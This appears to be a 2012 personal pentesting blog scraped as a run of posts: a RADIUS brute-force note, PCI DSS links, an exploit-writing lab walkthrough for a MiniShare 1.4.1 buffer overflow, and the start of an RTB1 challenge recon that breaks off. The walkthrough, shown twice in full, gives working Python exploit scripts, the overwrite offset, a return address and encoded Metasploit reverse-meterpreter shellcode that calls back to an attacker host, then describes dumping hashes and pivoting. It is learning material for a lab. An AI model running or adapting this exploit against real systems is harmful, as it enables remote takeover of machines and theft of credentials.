Saturday, December 22, 2012
RADIUS Brute-Force Tool
I was doing an assessment of an authentication solution using the RADIUS protocol and found the need to verify if there was a lock-out policy enforced. Also to verify my suspicions that one-time passwords were not used on all accounts.
Lock-out policies are useful and truly are a good countermeasure against bruteforce attacks. Also delaying an Access-Reject in the RADIUS server even just for a second causes the bruteforce attack to render useless since it takes too long.
Starting to investigate and browsing the web for a RADIUS Brute-force tool but i could not find one.
radclient which ships with FreeRADIUS can surely be used in combination with bash or shell scripting.
I found Pyrad which was exactly what i was after.
A RADIUS packet creator in python!
So i started to look at the examples and combining functionality.
This is what i came up with
radcrack.py
The output:
# ./radcrack.py userfile passfile
Attacking target...
Sending authentication request User-Name: admin
Access accepted: admin,password
To note:
A RADIUS server needs the following for this to apply.
- Shared secret configured must match the client (attacker) and the server
- Source IP-address needs to match.
Hope you find it useful as i did.
The code includes comments that can aid in troubleshooting and as examples, that is why i left them there, i am also using the freeradius dictionary.
/M
Tuesday, November 6, 2012
Security Assessments PCI DSS
PCI DSS standards. Adding this post for reference:
Documents library found at pcisecuritystandards.org.
The link below contains what you need to know to understand the requirements of PCI DSS.
https://www.pcisecuritystandards.org/security_standards/documents.php
Direct link to PCI-DSS v. 2.0 PDF:
Really good for reference if doing assessments.
Make sure your IT environment is correctly documented and comply BEFORE being assessed.
https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf
/M
Sunday, September 23, 2012
Exploit writing: Buffer overflows
Hello again.
To learn more about writing exploits i started with a simple application that already has public exploit code available and is vulnerable to a Buffer overflow attack.
While searching for public exploits for Minishare 1.4.1 i found that there was none for Windows XP with Service Pack 3 installed.
A great first assignment for education purposes.
So my mission became to exploit the vulnerable service and take over the machine.
Lab environment:
- Windows XP with Service Pack 3 installed, MiniShare 1.4.1 running on port 8080
and installed Ollydbg for debugging the application.
- My evil Backtrack 5 R2 (of course) for generating the exploit
First thing a hacker normally does is to gather information about what is running on the server.
A portscan, OS fingerprinting and gathering information about the services running.
Since i already know what is installed on the target i will skip this part.
Gathering information about the vulnerability..
Googling around I found out that the service is vulnerable when sending a oversized HTTP GET.
Let us write a little script to see if we can "smash the stack".
-----------
#!/usr/bin/python
import socket
target = 'TARGET'
port = 8080
buffer = "GET "
buffer+= "\x41" * 2000
buffer+= " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending exploit.."
s.connect((target,port))
s.send(buffer)
s.close()
-----------
What the above does is to create a TCP packet on port 8080, Sending a GET with 2000 "A" characters, \x41 is the equivalent of A.
Adding HTTP/1.1 and 2 newlines to the end.
Saving and executing the above sends the packet.
Looking at the server we see the following
SMASHED! as we can see, it is true, the service is vulnerable.
Next: Attach the debugger to the service
Try exploiting again..
We can see that we were able to overwrite the EIP which is a very good thing.
What we need to do now is to find out where the EIP get overwritten, where we could place the malicious code, a return address is needed.
Looking at the executable modules view in the debugger we find several dlls that are loaded.
Since the application does not have a dll file and only uses the operating system dlls we can use shell32.dll or the user32.dll.
To find a return address we can right-click on the shell32.dll and choose "view code in CPU"
And search for the command JMP ESP
A return address is found with JMP ESP (important information, write it down), but we do not know the offsets. We do not know how many characters before the EIP get overwritten when running the exploit.
There are a few methods of finding this out.
For example adding ranges of (A:s) \x41 combined with \x42 (B:s) and \x43 (C:s)..
Instead of sending 2000 A:s we can send 1000 A:s and 1000 B:s and narrowing down the actual location of the EIP.
Luckily metasploit has a tool called pattern_create that creates a pattern of characters that we can later do a search for in the debugger.
creating a pattern and adding it to our exploit.
./pattern_create.rb 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7......o1Co2Co3Co4Co5Co
Edit the exploit code and add this pattern to the buffer.
Our new exploit code:
------------------
#!/usr/bin/python
import socket
target = 'TARGET'
port = 8080
buffer = "GET "
buffer+= ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co")
buffer+= " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending exploit"
s.connect((target,port))
s.send(buffer)
s.close()
------------------
Sending the exploit will now reveal the following..
To find the offset we will use another tool from metasploit named pattern_offset.
Looking at the picture above we can see the offset address 36684335
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 36684335
1787
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb Ch7C
1791
This gives us the valuable information that the register starts at 1787 characters and is 4 bytes long meaning that this is where we will add the return address.
So modifying the exploit code with the new information. Instead of sending 2000 A:s we can send 1787 A:s and add the return address we found earlier searching for JMP ESP.
After the return address we will put our exploit code, but first it is good to test that the return address is working..
One thing to note is that we are running a x86 processor, little endian reads the reverse order, so we need reverse the 4 bytes in the return address. 7CA7A787 becomes \x87\xA7\xA7\x7C
We will edit the exploit code with:
Removing the pattern and adding the below return address and adding ABCD.
-----
buffer = "GET " + "\x41" * 1787 + "\x87\xA7\xA7\x7C"
buffer+= "\x41\x42\x43\x44"
-----
Before executing the code we will create a breakpoint in the debugger to observe what is happening.
Find the JMP ESP line, "Goto, Expression" and enter the address 7CA7A787
Doubleclicking on the line will turn it red which means that the breakpoint is set, using F2 is also an option.
Run the Exploit again.
We can see from the above that we could jump to the address (7CA7A787) and add ABCD.
Excellent, this means that we can go ahead and start adding payloads and malicious code to our exploit.
So here we need to decide what we want to do. The possibilities are endless!
A bind shell, reverse shell or a messagebox saying "your hacked" or something else nasty. :)
Since my mission was to take over the machine i will go with a metasploit meterpreter which gives us huge possibilities for further exploitation.
Adding Metasploit payloads as C shellcode:
Using msfpayload or msfvenom to create a reverse meterpreter payload.
Command:
The above creates just what we need, a reverse_tcp meterpreter connection to attacker-ip on port 443.
compiled for x86 architecture, removing bad characters and output as C shellcode.
Editing our exploit code with the payload:
Instead of sending A:s i will instead send \x90 which is a NOP and basically does nothing.
While reading about exploitation i found some hints on how to increase stability of the exploit code.
Adding NOPS just before the exploit code was something recommended so i added 16 NOPS just before the metasploit payload code.
-----------------
#!/usr/bin/python
import socket
target = 'TARGET'
port = 8080
buffer = "GET "
buffer+= "\x90" * 1787
buffer+= "\x87\xA7\xA7\x7C"
buffer+= "\x90" * 16
buffer+= ("\xdb\xd6\xb8\x7c\xdd\x95\x46\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x49\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x9e\x28\x69\xae\xd7"
"\xd3\x92\x2f\x87\x5a\x77\x1e\x95\x39\xf3\x33\x29\x49\x51\xb8"
"\xc2\x1f\x42\x4b\xa6\xb7\x65\xfc\x0c\xee\x48\xfd\xa1\x2e\x06"
"\x3d\xa0\xd2\x55\x12\x02\xea\x95\x67\x43\x2b\xcb\x88\x11\xe4"
"\x87\x3b\x85\x81\xda\x87\xa4\x45\x51\xb7\xde\xe0\xa6\x4c\x54"
"\xea\xf6\xfd\xe3\xa4\xee\x76\xab\x14\x0e\x5a\xa8\x69\x59\xd7"
"\x1a\x19\x58\x31\x53\xe2\x6a\x7d\x3f\xdd\x42\x70\x3e\x19\x64"
"\x6b\x35\x51\x96\x16\x4d\xa2\xe4\xcc\xd8\x37\x4e\x86\x7a\x9c"
"\x6e\x4b\x1c\x57\x7c\x20\x6b\x3f\x61\xb7\xb8\x4b\x9d\x3c\x3f"
"\x9c\x17\x06\x1b\x38\x73\xdc\x02\x19\xd9\xb3\x3b\x79\x85\x6c"
"\x99\xf1\x24\x78\x9b\x5b\x21\x4d\x91\x63\xb1\xd9\xa2\x10\x83"
"\x46\x18\xbf\xaf\x0f\x86\x38\xcf\x25\x7e\xd6\x2e\xc6\x7e\xfe"
"\xf4\x92\x2e\x68\xdc\x9a\xa5\x68\xe1\x4e\x69\x39\x4d\x21\xc9"
"\xe9\x2d\x91\xa1\xe3\xa1\xce\xd1\x0b\x68\x67\x7b\xf1\xfb\x24"
"\x65\xa0\xf5\x5c\x9b\x52\x0b\x26\x12\xb4\x61\x48\x72\x6e\x1e"
"\xf1\xdf\xe4\xbf\xfe\xca\x80\x80\x75\xf8\x75\x4e\x7e\x75\x66"
"\x27\x8e\xc0\xd4\xee\x91\xff\x73\x0f\x04\xfb\xd5\x58\xb0\x01"
"\x03\xae\x1f\xfa\x66\xa4\x96\x6e\xc9\xd3\xd6\x7e\xc9\x23\x81"
"\x14\xc9\x4b\x75\x4c\x9a\x6e\x7a\x59\x8e\x22\xef\x61\xe7\x97"
"\xb8\x09\x05\xc1\x8f\x96\xf6\x24\x0e\xeb\x20\x01\x94\x1d\x47"
"\x61\x54")
buffer+= " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending exploit"
s.connect((target,port))
s.send(buffer)
s.close()
-----------------
We are ready to exploit the service.
On the Attacker machine we will create a multi handler listening on port 443 to receive the reverse connection from the target.
If the exploit is successful we will receive a connection from the target starting a Meterpreter session.
Executing our code...
Exploit successful!!!
We now have a meterpreter session with the target. We could get system access.
Running sysinfo will show the servername, operating system version and language.
From here we have the whole metasploit framework to our advantage.
Gathering hashdumps, creating new services, activating Remote Desktop, pivoting and more.
We own this system!!!
Mission accomplished! :)
/M
To learn more about writing exploits i started with a simple application that already has public exploit code available and is vulnerable to a Buffer overflow attack.
While searching for public exploits for Minishare 1.4.1 i found that there was none for Windows XP with Service Pack 3 installed.
A great first assignment for education purposes.
So my mission became to exploit the vulnerable service and take over the machine.
Lab environment:
- Windows XP with Service Pack 3 installed, MiniShare 1.4.1 running on port 8080
and installed Ollydbg for debugging the application.
- My evil Backtrack 5 R2 (of course) for generating the exploit
First thing a hacker normally does is to gather information about what is running on the server.
A portscan, OS fingerprinting and gathering information about the services running.
Since i already know what is installed on the target i will skip this part.
Gathering information about the vulnerability..
Googling around I found out that the service is vulnerable when sending a oversized HTTP GET.
Let us write a little script to see if we can "smash the stack".
-----------
#!/usr/bin/python
import socket
target = 'TARGET'
port = 8080
buffer = "GET "
buffer+= "\x41" * 2000
buffer+= " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending exploit.."
s.connect((target,port))
s.send(buffer)
s.close()
-----------
What the above does is to create a TCP packet on port 8080, Sending a GET with 2000 "A" characters, \x41 is the equivalent of A.
Adding HTTP/1.1 and 2 newlines to the end.
Saving and executing the above sends the packet.
Looking at the server we see the following
Next: Attach the debugger to the service
Try exploiting again..
We can see that we were able to overwrite the EIP which is a very good thing.
What we need to do now is to find out where the EIP get overwritten, where we could place the malicious code, a return address is needed.
Looking at the executable modules view in the debugger we find several dlls that are loaded.
Since the application does not have a dll file and only uses the operating system dlls we can use shell32.dll or the user32.dll.
To find a return address we can right-click on the shell32.dll and choose "view code in CPU"
And search for the command JMP ESP
A return address is found with JMP ESP (important information, write it down), but we do not know the offsets. We do not know how many characters before the EIP get overwritten when running the exploit.
There are a few methods of finding this out.
For example adding ranges of (A:s) \x41 combined with \x42 (B:s) and \x43 (C:s)..
Instead of sending 2000 A:s we can send 1000 A:s and 1000 B:s and narrowing down the actual location of the EIP.
Luckily metasploit has a tool called pattern_create that creates a pattern of characters that we can later do a search for in the debugger.
creating a pattern and adding it to our exploit.
./pattern_create.rb 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7......o1Co2Co3Co4Co5Co
Edit the exploit code and add this pattern to the buffer.
Our new exploit code:
------------------
#!/usr/bin/python
import socket
target = 'TARGET'
port = 8080
buffer = "GET "
buffer+= ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co")
buffer+= " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending exploit"
s.connect((target,port))
s.send(buffer)
s.close()
------------------
Sending the exploit will now reveal the following..
To find the offset we will use another tool from metasploit named pattern_offset.
Looking at the picture above we can see the offset address 36684335
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 36684335
1787
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb Ch7C
1791
This gives us the valuable information that the register starts at 1787 characters and is 4 bytes long meaning that this is where we will add the return address.
So modifying the exploit code with the new information. Instead of sending 2000 A:s we can send 1787 A:s and add the return address we found earlier searching for JMP ESP.
After the return address we will put our exploit code, but first it is good to test that the return address is working..
One thing to note is that we are running a x86 processor, little endian reads the reverse order, so we need reverse the 4 bytes in the return address. 7CA7A787 becomes \x87\xA7\xA7\x7C
We will edit the exploit code with:
Removing the pattern and adding the below return address and adding ABCD.
-----
buffer = "GET " + "\x41" * 1787 + "\x87\xA7\xA7\x7C"
buffer+= "\x41\x42\x43\x44"
-----
Before executing the code we will create a breakpoint in the debugger to observe what is happening.
Find the JMP ESP line, "Goto, Expression" and enter the address 7CA7A787
Doubleclicking on the line will turn it red which means that the breakpoint is set, using F2 is also an option.
Run the Exploit again.
We can see from the above that we could jump to the address (7CA7A787) and add ABCD.
Excellent, this means that we can go ahead and start adding payloads and malicious code to our exploit.
So here we need to decide what we want to do. The possibilities are endless!
A bind shell, reverse shell or a messagebox saying "your hacked" or something else nasty. :)
Since my mission was to take over the machine i will go with a metasploit meterpreter which gives us huge possibilities for further exploitation.
Adding Metasploit payloads as C shellcode:
Using msfpayload or msfvenom to create a reverse meterpreter payload.
Command:
The above creates just what we need, a reverse_tcp meterpreter connection to attacker-ip on port 443.
compiled for x86 architecture, removing bad characters and output as C shellcode.
Editing our exploit code with the payload:
Instead of sending A:s i will instead send \x90 which is a NOP and basically does nothing.
While reading about exploitation i found some hints on how to increase stability of the exploit code.
Adding NOPS just before the exploit code was something recommended so i added 16 NOPS just before the metasploit payload code.
-----------------
#!/usr/bin/python
import socket
target = 'TARGET'
port = 8080
buffer = "GET "
buffer+= "\x90" * 1787
buffer+= "\x87\xA7\xA7\x7C"
buffer+= "\x90" * 16
buffer+= ("\xdb\xd6\xb8\x7c\xdd\x95\x46\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x49\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x9e\x28\x69\xae\xd7"
"\xd3\x92\x2f\x87\x5a\x77\x1e\x95\x39\xf3\x33\x29\x49\x51\xb8"
"\xc2\x1f\x42\x4b\xa6\xb7\x65\xfc\x0c\xee\x48\xfd\xa1\x2e\x06"
"\x3d\xa0\xd2\x55\x12\x02\xea\x95\x67\x43\x2b\xcb\x88\x11\xe4"
"\x87\x3b\x85\x81\xda\x87\xa4\x45\x51\xb7\xde\xe0\xa6\x4c\x54"
"\xea\xf6\xfd\xe3\xa4\xee\x76\xab\x14\x0e\x5a\xa8\x69\x59\xd7"
"\x1a\x19\x58\x31\x53\xe2\x6a\x7d\x3f\xdd\x42\x70\x3e\x19\x64"
"\x6b\x35\x51\x96\x16\x4d\xa2\xe4\xcc\xd8\x37\x4e\x86\x7a\x9c"
"\x6e\x4b\x1c\x57\x7c\x20\x6b\x3f\x61\xb7\xb8\x4b\x9d\x3c\x3f"
"\x9c\x17\x06\x1b\x38\x73\xdc\x02\x19\xd9\xb3\x3b\x79\x85\x6c"
"\x99\xf1\x24\x78\x9b\x5b\x21\x4d\x91\x63\xb1\xd9\xa2\x10\x83"
"\x46\x18\xbf\xaf\x0f\x86\x38\xcf\x25\x7e\xd6\x2e\xc6\x7e\xfe"
"\xf4\x92\x2e\x68\xdc\x9a\xa5\x68\xe1\x4e\x69\x39\x4d\x21\xc9"
"\xe9\x2d\x91\xa1\xe3\xa1\xce\xd1\x0b\x68\x67\x7b\xf1\xfb\x24"
"\x65\xa0\xf5\x5c\x9b\x52\x0b\x26\x12\xb4\x61\x48\x72\x6e\x1e"
"\xf1\xdf\xe4\xbf\xfe\xca\x80\x80\x75\xf8\x75\x4e\x7e\x75\x66"
"\x27\x8e\xc0\xd4\xee\x91\xff\x73\x0f\x04\xfb\xd5\x58\xb0\x01"
"\x03\xae\x1f\xfa\x66\xa4\x96\x6e\xc9\xd3\xd6\x7e\xc9\x23\x81"
"\x14\xc9\x4b\x75\x4c\x9a\x6e\x7a\x59\x8e\x22\xef\x61\xe7\x97"
"\xb8\x09\x05\xc1\x8f\x96\xf6\x24\x0e\xeb\x20\x01\x94\x1d\x47"
"\x61\x54")
buffer+= " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending exploit"
s.connect((target,port))
s.send(buffer)
s.close()
-----------------
We are ready to exploit the service.
On the Attacker machine we will create a multi handler listening on port 443 to receive the reverse connection from the target.
If the exploit is successful we will receive a connection from the target starting a Meterpreter session.
Executing our code...
Exploit successful!!!
We now have a meterpreter session with the target. We could get system access.
Running sysinfo will show the servername, operating system version and language.
From here we have the whole metasploit framework to our advantage.
Gathering hashdumps, creating new services, activating Remote Desktop, pivoting and more.
We own this system!!!
Mission accomplished! :)
/M
Saturday, September 22, 2012
Learning how to write exploits
Hello again.
For many years i have stayed updated about the latest vulnerabilities and exploits, but never really took the time to learn how to actually write them. So now I decided it is time for me to learn how to write exploits.
I am doing some serious reading at the moment about the topic. Found a few good tutorials that i must go through. With not much time on my hands (children, work etc. goes first) i will go through the tutorials slowly but eventually i will get there.
The first thing i found useful if not a prerequisite is Learning python scripting.
Googled around and found some really good interactive free courses on-line. So went through some of the chapters. Since i have been writing perl and bash scripts for a while it should not be that difficult.
Really interesting.
I set up a lab environment. Just an XP box where i can install some vulnerable services.
Downloaded OllyDebugger to see how applications behave in CPU and memory stack.
So off I go! More to come...
Bye for now..
/M
For many years i have stayed updated about the latest vulnerabilities and exploits, but never really took the time to learn how to actually write them. So now I decided it is time for me to learn how to write exploits.
I am doing some serious reading at the moment about the topic. Found a few good tutorials that i must go through. With not much time on my hands (children, work etc. goes first) i will go through the tutorials slowly but eventually i will get there.
The first thing i found useful if not a prerequisite is Learning python scripting.
Googled around and found some really good interactive free courses on-line. So went through some of the chapters. Since i have been writing perl and bash scripts for a while it should not be that difficult.
Really interesting.
I set up a lab environment. Just an XP box where i can install some vulnerable services.
Downloaded OllyDebugger to see how applications behave in CPU and memory stack.
So off I go! More to come...
Bye for now..
/M
Thursday, September 6, 2012
Hacking challenge RTB1
Hello Again.
A while back i started to research web app pentesting and managed to get through the DVWA hackademic challenges, an excellent way to learn Web App Pentesting by the way.
I did not post a blog entry for this. Will maybe do that later on.
I kind of felt that my skills within this area started to become rusty so I got active again and brought on another Challenge. The RTB1.
Root this box version 1, a VMware on linux running a webserver with backend database and applications.
I did not know what to expect so i began to explore..
First setting up the environment needed in VMware with host-only networking.
- RTB1
- My evil attack machine Running BT5R2
First i started off with SCANNING AND INFORMATION GATHERING.A really important step in the process of Penetration testing.
Since i know that the host is on my local subnet i do a simple ARP-scan to find the host.
root@bt:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.140.133 00:0c:29:e1:16:bf VMware, Inc.
Wonderful, we have the IP-address. Next...
PORTSCAN, WHAT IS IT RUNNING?
root@bt:~# nmap -v -n -P0 -sT 192.168.140.133
Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-05 09:24 CEST
Initiating Connect Scan at 09:24
Scanning 192.168.140.133 [1000 ports]
Discovered open port 80/tcp on 192.168.140.133
Connect Scan Timing: About 42.90% done; ETC: 09:25 (0:00:41 remaining)
Completed Connect Scan at 09:25, 60.14s elapsed (1000 total ports)
Nmap scan report for 192.168.140.133
Host is up (0.92s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds
OK. A webserver, how surprising :) Lets find out more..
BANNER GRABBING
root@bt:~# nc 192.168.140.133 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 05 Sep 2012 01:54:43 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Sun, 09 Jan 2011 17:22:11 GMT
ETag: "31cc-5c3-4996d177f5c3b"
Accept-Ranges: bytes
